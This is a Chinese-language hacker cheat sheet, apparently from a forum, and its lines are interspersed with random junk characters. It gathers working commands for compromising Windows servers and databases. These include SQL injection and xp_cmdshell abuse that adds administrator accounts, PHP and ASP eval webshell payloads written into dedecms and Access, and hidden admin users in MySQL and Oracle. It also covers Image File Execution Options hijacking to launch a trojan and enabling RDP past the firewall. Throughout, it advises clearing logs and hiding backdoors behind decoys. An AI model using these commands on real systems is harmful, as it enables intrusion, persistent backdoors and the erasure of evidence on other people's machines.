1 n7 n* l7 ~. s( Q7 O
1.net user administrator /passwordreq:no
9 Q. `8 V5 m" m" t这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了, ~# ^2 r/ F1 c% N9 K- R
2.比较巧妙的建克隆号的步骤% U h' W/ e8 \ k: p2 ^( g
先建一个user的用户& _/ _8 F! w3 x* F( ?( S
然后导出注册表。然后在计算机管理里删掉
$ l- n# q: ~! b在导入,在添加为管理员组" e" ^' s2 V) r9 v( d T: ?
3.查radmin密码
2 K. B% N) J0 [- B) mreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
^8 V! w k. Y$ L2 n) G. m4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]1 W* r' Y9 }8 g" F; a& \
建立一个"services.exe"的项
+ j3 {3 M& g1 w I- k6 T- G再在其下面建立(字符串值)
' L1 @) F: l" p2 F键值为mu ma的全路径
! n+ A; Y& ^0 w0 q# M/ o5.runas /user:guest cmd2 Q& f. i9 i" a! l1 i* R% `) V9 s
测试用户权限!5 ^$ f, P7 @3 x9 @" L
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
; j1 W7 u9 F& ]# U) S$ ?0 f7.入侵后漏洞修补、痕迹清理,后门置放:" b8 G* r) L7 K; ]
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门8 k" D/ Z% O! r! F" F
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c$ @$ t$ [1 j" F) t Z
2 ^ w9 {1 R. }' K
for example& }& C1 F6 ~/ I+ J* I3 }
: n8 Q- X4 w( @7 o0 ~& V7 Z+ qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'; c* i ~) x: i9 B* ~+ `+ R; x
# E! c5 l0 ^) l7 C+ B5 Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'2 B0 K9 ~$ l" G7 H7 ^; A) m4 Y& m
# e% m4 D" M! x# O! m, w$ a0 _9:MSSQL SERVER 2005默认把xpcmdshell 给ON了: ^# j0 B; S# a, \6 \
如果要启用的话就必须把他加到高级用户模式
; e* g7 m3 n( r4 h可以直接在注入点那里直接注入/ o( O. j4 d3 ]# Z% T+ g* G8 T
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
* T" T ?) V6 T0 e然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
7 N, b8 L) W4 U! z+ K" k' E y或者
7 ~+ ^4 ` e4 tsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' F, a( q) G$ }2 {2 S& s$ i) ?* j
来恢复cmdshell。7 A) F4 O8 S- W4 s& _! L
+ m2 e) J( s: V4 `2 l, M" A
分析器
0 `( S( R/ N% T6 Y* N) rEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--( {( }0 {, a+ {( a- p; S4 z' |# R
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
+ a, P. W* w2 G* |) ^; u" i* a10.xp_cmdshell新的恢复办法
7 _, S: q$ x1 j9 o: yxp_cmdshell新的恢复办法
* s* U" y: T2 _0 c扩展储存过程被删除以后可以有很简单的办法恢复:
" x8 C x: c8 u+ K; q, S删除. O* T! `& E) ]- @( }2 E }
drop procedure sp_addextendedproc8 a( _( ?( X) q* T8 ?3 [5 Q' g
drop procedure sp_oacreate5 l. y( k: p2 R& _
exec sp_dropextendedproc 'xp_cmdshell'& O: C# w8 G) h2 e! Q# [1 Y- j
G/ T( Z" w0 ]7 V/ f3 b
恢复
% Q. H6 Q; x6 Jdbcc addextendedproc ("sp_oacreate","odsole70.dll")
3 N/ ]4 S* D( {2 R, Vdbcc addextendedproc ("xp_cmdshell","xplog70.dll")4 i' |, A! U; i
* ]1 ~) F! T6 |' ?2 c* W
这样可以直接恢复,不用去管sp_addextendedproc是不是存在 e5 |. Y* @4 L: Q E/ N Q
7 J: U2 {2 }3 H1 `-----------------------------; Z* O0 N. I( U7 ^1 M- C, ~
- M9 _; {2 o% M/ b, q8 @% U$ Z
删除扩展存储过过程xp_cmdshell的语句:' B7 W, M, A" @/ j3 \$ K
exec sp_dropextendedproc 'xp_cmdshell'
, K% d$ J* {9 v E( e
+ k3 w D& ]6 w4 d5 n, E* P恢复cmdshell的sql语句
$ E, _. B) |9 Q' w( Qexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" h1 y- w5 {1 s7 q7 E7 _- Y1 u3 V( ^" s
/ v, Q( l5 Y8 X D3 }& |开启cmdshell的sql语句
) W5 @! i6 Z. r) H7 D: H/ p
& |" D5 |6 L! v) g# Iexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'* C4 Q* m* u$ r$ H" C, F0 O' x
# n. r0 c! B# Y: F# g: r9 E判断存储扩展是否存在/ j# H0 f9 ?: ]5 s
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
7 T ]: n1 D: P# x+ x5 o: Z/ m返回结果为1就ok+ a" @ l' Z I0 m+ _- r, h; B( ~
( i0 k8 I; \5 A! e. F+ e
恢复xp_cmdshell6 N. y- h4 z7 c: K9 T5 k8 Z$ ]
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'" V, z* [. i2 h; s7 Q1 O' \3 {4 ?
返回结果为1就ok
8 ?7 _* D& Z4 Q1 [8 ~) }+ R3 `. g, S6 u, V8 f
否则上传xplog7.0.dll, C, Q; m7 y* @2 N
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'; u& p* b( N/ G( d: h; \
) y0 j2 J* {: i/ h$ U% V3 Y. ?# M
堵上cmdshell的sql语句5 ~; L' Y0 }( W
sp_dropextendedproc "xp_cmdshel
* f+ V7 d; T8 J$ P2 I+ I-------------------------2 d# Q& b- z+ x
清除3389的登录记录用一条系统自带的命令:
+ I2 t. D% T9 k& c* Y: G' o6 E: Hreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
" l1 ~6 L4 m% |$ y6 I
3 L/ K7 c* o* h/ i) P" J然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件8 K, _ [6 r8 h, n* @1 y: ]
在 mysql里查看当前用户的权限( o- V3 z4 p9 q" ^- Z$ e; f
show grants for
r( Y3 B' \1 }/ k A; L( M3 i8 M! X6 `
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
5 j; j; ^1 e1 K$ D8 Y0 M' w
- s, i! w; C" J0 ~* d: j4 s& r3 A \+ u+ a5 w6 d5 s
Create USER 'itpro'@'%' IDENTIFIED BY '123';* ]& B) P0 `* e3 @: K# [
' }) ]2 d5 i5 M9 v. b
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
* |# A# x7 h1 W+ p# q( ^5 e; ^6 @5 J, E( o. w
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0& q3 h6 e* n/ b% ]* V
) w! L9 |+ S) M m1 D
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;: Q/ G' \6 q' O6 ~3 x' ^' R0 H
' N+ P- o+ K! q: P* Z
搞完事记得删除脚印哟。) z7 Q7 A Z/ @7 k9 |# p/ Q- `
4 a$ ~, h# n3 QDrop USER 'itpro'@'%';3 E: L0 b- T4 n: A+ E3 K( e
7 [ S" C. o+ ^- d
Drop DATABASE IF EXISTS `itpro` ;: U2 z) X5 [6 T+ U8 D# [; H
8 {2 {: D8 | Y当前用户获取system权限
: ^- t1 Z3 Z" I( x$ X) O5 c2 ssc Create SuperCMD binPath= "cmd /K start" type= own type= interact2 |; m' f' L0 E/ g/ U
sc start SuperCMD
5 e2 S$ A5 p5 R4 p0 F# {) k1 c* g程序代码
: l8 r+ W. |1 U0 k' ~- T<SCRIPT LANGUAGE="VBScript">3 r. l1 T- T8 A$ C5 ]; ~: @) g
set wsnetwork=CreateObject("WSCRIPT.NETWORK"), |0 I7 r1 v5 M0 c2 L& H
os="WinNT://"&wsnetwork.ComputerName
1 D8 x4 g0 H5 ?. [Set ob=GetObject(os)
2 W' v' t: v) j9 G2 w; D' z6 {3 hSet oe=GetObject(os&"/Administrators,group")& x: t9 C& p3 y0 B" ^ u
Set od=ob.Create("user","nosec")" J# t( J" s8 K9 ]( K
od.SetPassword "123456abc!@#"
- X$ d: }+ o; q0 Z H* Y: Wod.SetInfo1 @4 B" H' f# Y5 V% U
Set of=GetObject(os&"/nosec",user). }1 ~- U. ]8 M0 A' Q$ [& e0 J( p
oe.add os&"/nosec"
+ I) Q0 ?; Z% `2 _; _</Script>
+ U' {+ q- n4 S6 s4 w4 Y<script language=javascript>window.close();</script>2 W5 y H; F% d: q2 `1 _, i: a
5 q8 J+ ]" ^1 T4 D' H- w& }( {& p8 \& E* e1 K' I: E
- ?* `7 c; Q7 j0 m8 e/ [2 U
( m# x7 c( Z0 x7 U" z: g7 k突破验证码限制入后台拿shell8 w3 P( E- I: R
程序代码* u* O: I( `! _) p4 S+ S2 s
REGEDIT4
+ p3 Y: L4 Q6 F[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] - D7 m( z2 ~6 @( T1 c: {! D& b
"BlockXBM"=dword:00000000, d. ^. H$ a$ R/ M5 M4 G
) X3 M7 l" Y- a9 `! x0 e5 d: W" J
保存为code.reg,导入注册表,重器IE3 x7 c& k" `( }$ q; y+ U- G
就可以了3 F- M- R7 \" ]) t9 [6 z$ t7 d
union写马8 `- k% ~+ P; v3 K3 {& J* b
程序代码
5 ^1 R, K, [+ J% E5 owww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*3 g, a6 g. {: p8 W M
. ^7 e0 ]/ q5 W, i
应用在dedecms注射漏洞上,无后台写马8 C* t$ k6 U, x/ Y
dedecms后台,无文件管理器,没有outfile权限的时候3 E3 h/ S9 v( l* z# P
在插件管理-病毒扫描里
' b- r3 `$ i5 ~7 g* J( n写一句话进include/config_hand.php里- j8 I J- r/ |, j4 |
程序代码* W1 W% B* `+ x& V' j4 h$ n: Y
>';?><?php @eval($_POST[cmd]);?>
7 H6 J7 [0 A$ L/ b# U: k# i, N- G
$ s+ e% Q. H# _" i1 J7 T5 ^$ I
3 t; j0 C6 a) ]8 Y5 |- \如上格式
1 Y5 p6 h# G; y9 t7 I5 R. Y( M
, ]/ R% n' V6 H! _4 u# xoracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
( Y3 G+ L1 Y! u" [" b程序代码
$ e7 j; w: u' O; Gselect username,password from dba_users;
4 l& m7 Z) u+ W3 B
8 d" o0 ~/ r$ m: B+ h0 I& Z3 c$ j% a! U7 v0 f* t' `
mysql远程连接用户
: F4 @. m4 ]* s. s& g F ]程序代码
+ t' m+ {- M6 s( C" N- k
% ?" |: v& Y" a- ZCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';1 F$ v$ I" w# j
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
& R7 @/ E" b; [/ JMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
+ \7 z9 G0 }: X+ x: ~" G! ]% FMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;: e6 f# f' p d- U T* u3 @
, t) t4 K- V: M/ H
7 W! m, j2 o; T' P2 D
& T9 v& ~/ f: m7 E- w5 f1 j
7 D1 Z& Y. Y/ g, K9 W" i Eecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
. E* H3 n$ t( M. `' Y6 o7 J+ R1 G2 T- T7 @/ [+ M- d' D
1.查询终端端口
( B4 s2 s3 N: G2 Q) C: O; P) `: E! U5 q: R2 C. v
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber% _, @9 [# j) x
: u Z* M3 L! Z1 [3 z X8 z+ v8 Q通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"* c" t: s S# M. A' v% ?4 O
type tsp.reg
/ M( Q5 i5 @+ O- s" y
2 B8 W6 k2 f6 m5 h D4 \! F y2.开启XP&2003终端服务5 O7 P% K: _. M7 L9 }. y- Q) O/ X
5 }. t; L9 Q7 T: D3 N% W# c0 ]9 e5 m H
$ ~) s, e+ ] \3 b3 K6 w9 lREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f8 G4 `6 z. z5 t3 b, Q* t- v
2 @! O" k& |) s- X
0 r1 Z2 Z) Y- u8 V
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
$ Z1 q+ R# V" I3 b/ F4 L* q5 A" L1 N3 A6 z0 ~. B8 m# R% j
3.更改终端端口为20008(0x4E28)1 v' {; P8 o5 O% u9 f
: E* N) w3 `. Z' a
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f1 a% o+ g( b% {$ n" ]3 s- G" f
/ R7 U% \" P v; u
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
3 E: q! m9 r9 O; j0 Y' y4 P# l
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
1 k7 a( Q+ s6 H
) @* Z8 Z( `% {( |REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
+ {. X8 |. M8 z6 F" a. m2 Y3 U! K; _' n; h9 q. K1 R) w
' n) j0 Z" _$ ?" H; z. E4 L5.开启Win2000的终端,端口为3389(需重启)
7 U% a* X3 W* r; y& L! t* n5 h* | r& ?
echo Windows Registry Editor Version 5.00 >2000.reg
$ d6 ~! X9 I0 |! wecho. >>2000.reg! `& ~! Q. b: G
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
) L/ j) A3 M$ e E- |echo "Enabled"="0" >>2000.reg
* R* c+ p$ H" {) y% Lecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg " M6 Y8 {1 L: U$ O
echo "ShutdownWithoutLogon"="0" >>2000.reg
g: G3 S0 x: m+ n5 Kecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
8 E' M3 y( [' Wecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg 7 S! r6 B: T) ^; g( P' M/ i( R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg # d" N: n% @' w2 Z
echo "TSEnabled"=dword:00000001 >>2000.reg 9 B+ c, \3 F5 h/ E9 m* m" e$ E
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
9 C# x' R4 p& O& A$ Uecho "Start"=dword:00000002 >>2000.reg
. z" }' _# t5 c) Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
4 H2 k1 |/ a4 J9 p Decho "Start"=dword:00000002 >>2000.reg " R& G7 ~) s7 [3 a/ n& J0 \
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
- D! r2 {$ E* P pecho "Hotkey"="1" >>2000.reg 3 T. P3 b& e6 e. U
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
' ?9 O, |9 R P, x/ mecho "ortNumber"=dword:00000D3D >>2000.reg : c6 D/ j7 }* C* K% A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
5 g4 C/ O* o% s `7 Wecho "ortNumber"=dword:00000D3D >>2000.reg
- i, G# N9 D) j3 o" W9 i) d4 J8 n) l5 o# L) Q
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)2 \! j1 A% e; t# Z( S: X: T0 Z
3 r. Y4 H+ l* e/ P
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
9 `: P7 |2 S2 B8 F(set inf=InstallHinfSection DefaultInstall)
' X9 X& Q$ Q: z% S! V. yecho signature=$chicago$ >> restart.inf# ^0 t& s: i! c$ J' O8 T
echo [defaultinstall] >> restart.inf( T- I* Z7 z& ^+ q
rundll32 setupapi,%inf% 1 %temp%\restart.inf1 b" j7 h1 G- U- T' ^# H4 |
- z+ a& Y. M" M0 ]& | J! y9 ?3 O+ Z4 S. p% b0 v
7.禁用TCP/IP端口筛选 (需重启)
2 z/ S @' p! E2 j* m2 h$ ]( |7 T1 A, M. S0 p9 @7 ^( B2 |
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f8 u0 T5 y/ g* ~. _6 F# o& M* M
8 @8 m# b5 j C1 C8.终端超出最大连接数时可用下面的命令来连接
" }; l" S- ^4 Q8 N* x* `% I, M, X9 w
$ C" W( J8 J' lmstsc /v:ip:3389 /console
; p/ c8 }2 h0 d4 x" g' \
6 e" n$ L% H4 h. l9.调整NTFS分区权限' C( w g3 q) _7 A+ [$ A+ m+ ^ q
! T7 |$ [# r' R& q0 R# M8 w
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利); q p& d0 B6 [/ b+ B9 f
* o+ C& {9 E( v# T4 `4 `& p* k. qcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)# f' l( y+ X: z7 o
3 w% l8 F) f' O9 Q" @. d------------------------------------------------------. G: B) {8 o9 v* c7 E" Q- Y1 G+ s1 _
3389.vbs - \( ?+ I5 p1 l" f$ w H
On Error Resume Next
" q' C4 A! ?5 m" d% yconst HKEY_LOCAL_MACHINE = &H80000002: r. G7 l$ V K8 D% B1 N- V9 O' e
strComputer = "."% j A0 g6 a" D" \
Set StdOut = WScript.StdOut
* M' Y& D0 {$ n& K2 Z) ISet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
* I( ?& J3 m. w% R! kstrComputer & "\root\default:StdRegProv")7 B9 }; E& c3 `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
- p6 u: p# o/ P% S3 i. b" d; \oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath0 m1 f8 _4 e9 z! G0 I4 i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"; o" O5 K$ g8 U) T% J& q
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
; d% Y! D/ c% B2 c SstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/ c, q1 F: g# [% B+ E5 ^
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"8 R+ J0 x9 ` O
strValueName = "fDenyTSConnections"
$ f" B+ G. T) x4 Z; I+ _dwValue = 0. I) J3 F1 \* J) g& w/ Q+ h' v5 U
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* I/ \# K0 A: w/ F0 b l6 B7 O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
2 p( @- {4 y8 ~9 IstrValueName = "ortNumber"% H3 U) t6 i$ }3 J1 C
dwValue = 3389
( F* g! d2 I5 U- c& yoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
+ V1 |1 K: f1 O" V* E7 \1 ~* rstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 g+ ?) B. |: m( r1 _0 VstrValueName = "ortNumber"
" i" }" h% \ ?% U7 `+ HdwValue = 3389. E7 _( j3 r7 `- f
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
( g2 x. b/ n& G: l- Y6 k! aSet R = CreateObject("WScript.Shell") - r, F8 y; ?3 ?, z) V7 _' A
R.run("Shutdown.exe -f -r -t 0")
" ^5 O% g% B0 [, G! x/ g( i0 ?7 n" M6 L+ D
删除awgina.dll的注册表键值
/ U5 [0 {1 P3 j' m0 ]' J) X6 [程序代码3 ?. a: @! d" a" b9 L$ d
8 [4 y4 I, G' Q5 T& d( _: }reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f' P$ a5 \$ C8 p% H! T8 u3 {' i# z
- @: N4 r7 N( [0 \9 Z+ p, _# n- B0 t- v$ F2 B
$ M! } b2 U u) Q
T `) r& V* y g9 O: h/ D程序代码
1 d5 d9 o( Z$ S. P3 mHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash- n0 T2 D) ]6 v3 ]$ P
* r. D4 x* c' i8 P7 y
设置为1,关闭LM Hash
% Y/ T+ X/ d+ y- @. K+ D0 b, @
" |3 Y6 Y0 Z+ S9 y! i" b数据库安全:入侵Oracle数据库常用操作命令
: k7 j3 a8 e, I最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
+ i! A1 x$ A: B) h1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
) \- q& l1 p: D2 y: j7 g2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;3 X4 d! `8 t2 ?9 @6 c/ U) J% O
3、SQL>connect / as sysdba ;(as sysoper)或
2 O' z/ O: A+ Yconnect internal/oracle AS SYSDBA ;(scott/tiger)4 D1 S! `) l- p) h
conn sys/change_on_install as sysdba;
+ i2 V4 T7 U* F& T: r4、SQL>startup; 启动数据库实例
. N" S. _- Y) Y! G* W5 {5、查看当前的所有数据库: select * from v$database;, y9 a# Z$ e! Y! {( M( Q8 [+ _4 L
select name from v$database;
' s6 G: Y9 Q/ Z. l9 }& s' [# s9 `+ J6、desc v$databases; 查看数据库结构字段% I; ^- C* j" N" _% _
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
* f V; I* s0 E& ^2 I1 {SQL>select * from V_$PWFILE_USERS;
7 q$ J1 X \) l" M5 @) }Show user;查看当前数据库连接用户5 P( J8 g9 o4 N d" @ e
8、进入test数据库:database test;
- L5 b8 [$ d0 l2 L8 N- D2 H3 `" l9、查看所有的数据库实例:select * from v$instance;
! u9 w5 q* a1 o- n3 J如:ora9i6 {5 K$ G- Q9 w
10、查看当前库的所有数据表:! J5 [7 ~+ N! W/ n7 R( I
SQL> select TABLE_NAME from all_tables;2 x, e/ d' o3 T' w) }6 J
select * from all_tables;
9 C2 H8 T0 Z, l$ VSQL> select table_name from all_tables where table_name like '%u%';# H$ o% J2 ~" _8 a+ g
TABLE_NAME
" _) O; Y4 `5 T4 @------------------------------0 R: F$ W# R( I/ h8 Y
_default_auditing_options_
. A0 R( d. R& k11、查看表结构:desc all_tables;6 d4 T5 s4 Q/ c
12、显示CQI.T_BBS_XUSER的所有字段结构:
5 O- q1 ~& Q4 t$ K4 I! m: l& Q0 qdesc CQI.T_BBS_XUSER;
* k' I# r: f- g8 L13、获得CQI.T_BBS_XUSER表中的记录:6 k! X/ c- s8 u- x! E3 v
select * from CQI.T_BBS_XUSER;
3 W# P3 f; R! C0 W" s14、增加数据库用户:(test11/test)
# J3 o: X. B$ Ecreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;" O- q& B; K: q9 B- X, J
15、用户授权:
5 o- D8 F3 d' c) g. _) I" rgrant connect,resource,dba to test11;1 _; [" Q& t2 O9 O2 g( y. w
grant sysdba to test11;" {( @$ X ~ }/ l" g- V* Q2 _, V
commit;
9 H4 J2 w; P5 M- a0 |' o16、更改数据库用户的密码:(将sys与system的密码改为test.)1 Q7 ]. Z% I# e. X1 z
alter user sys indentified by test;
- I5 U6 {8 Y) e! o; kalter user system indentified by test;# \: \% m6 l4 S
& W0 p8 \3 a% Y9 e6 @+ zapplicationContext-util.xml
% L4 v D9 ]. }9 T" d) O/ W) qapplicationContext.xml
) p( Z# [; ?) M6 ystruts-config.xml8 Q9 K# e* y ]- s; p
web.xml
3 }. M% h( {; S Z/ Y" L+ ]) `% U) _server.xml
! N+ G+ ^ j. _! N- ^0 ^1 H* Atomcat-users.xml
# d9 r" g" z! I) ^) chibernate.cfg.xml
' h2 h; G3 z; p7 rdatabase_pool_config.xml
7 M( q' b* M5 a: l! @" A' q& q, m L) L3 L4 A
/ j- a8 _0 v+ F
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置6 V3 [( O% D2 k! h
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
: u* V. K0 M) Z3 S; O6 Y% |; m+ X\WEB-INF\struts-config.xml 文件目录结构
( _- L/ l2 R* @% b1 v
! k, X, v- q4 q( J4 Nspring.properties 里边包含hibernate.cfg.xml的名称! U, p6 G# F4 X* O5 _ f# g
) u* i* h0 k% K, y0 V3 q" D9 X! K) l" I! v
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
% D8 Y- Z7 [# o9 f$ i+ X
: u F" v3 ~- Z P* U如果都找不到 那就看看class文件吧。。3 h6 i) i# W! F* {
" U0 V/ Z/ Y H测试1:
" J3 [/ ^7 E1 pSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1# P0 z& U2 i I- T0 ?" b1 T
) I3 z5 d; c' t( g( |) r# h5 H
测试2:, i9 X5 ?. s6 ?- a' A( H9 }
3 r7 H" t3 C, u
create table dirs(paths varchar(100),paths1 varchar(100), id int)1 N* Z/ N' v; A6 ?& B
% n) e* w: h6 d/ ]
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--6 F3 h* X* W: k" r J* F9 c+ A
7 } {* |6 {5 H) B0 t& W- v! ^2 K; ]
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
: r# p1 ]6 l8 c6 m9 C3 R
" u/ v4 R u) y. A3 {查看虚拟机中的共享文件:( Z7 B8 a2 d7 @) n9 E, T$ J6 w/ Y9 x
在虚拟机中的cmd中执行
; U: D( O: h0 B/ y# K- h0 }\\.host\Shared Folders
( k2 z' y: Y9 D- s- n% @
: Z+ p! ?, E6 g0 s( ]1 }cmdshell下找终端的技巧' r5 | H7 |7 {1 l! `& ]
找终端:
" d; e( @9 i0 }第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! / z+ K7 Y; R' u
而终端所对应的服务名为:TermService
* j5 v- L7 x3 S) G0 _ P# n, R& h+ ]9 a第二步:用netstat -ano命令,列出所有端口对应的PID值! ; F1 T/ P6 j4 u% @& [: _+ T7 U9 ^
找到PID值所对应的端口
+ B G( U) f6 }3 T$ V, z
" _" o% ]$ W$ I3 g; p查询sql server 2005中的密码hash
h5 w) @' l8 x# v' NSELECT password_hash FROM sys.sql_logins where name='sa' @: Q6 @" Q+ l/ ^% Y
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a, o7 \ a2 o% P, o+ O- [9 u5 x
access中导出shell! m' s7 i/ e2 c# B
